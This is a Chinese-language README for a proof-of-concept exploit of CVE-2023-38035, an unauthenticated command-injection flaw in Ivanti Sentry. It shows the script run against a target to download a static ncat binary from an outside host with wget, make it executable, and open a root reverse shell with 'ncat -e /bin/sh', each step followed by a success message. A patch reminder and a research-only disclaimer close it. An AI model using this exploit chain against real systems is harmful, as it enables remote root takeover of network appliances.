影响 Ivanti Sentry 的 CVE-2023-38035 POC
关于该漏洞的技术根本原因分析可参阅我们的博客: https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive
该 POC 利用一个未经验证的命令注入漏洞,以 root 用户身份执行任意命令。
执行环境不允许使用命令管道,且系统未自带易于滥用的二进制文件,因此可以通过串联命令,从类似 https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat 的位置下载静态 ncat。
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'wget http://123.123.123.123:8000/ncat -O /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'chmod +x /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'sudo /tmp/ncat 123.123.123.123 4444 -e /bin/sh'
[+] Successfully executed command on target!

请按照 Ivanti 安全公告中的说明更新至最新版本
本软件纯粹出于学术研究和开发有效防御技术的目的而创建,除明确授权的情况外,不应用于攻击系统。项目维护者不对软件的滥用负责。请负责任地使用。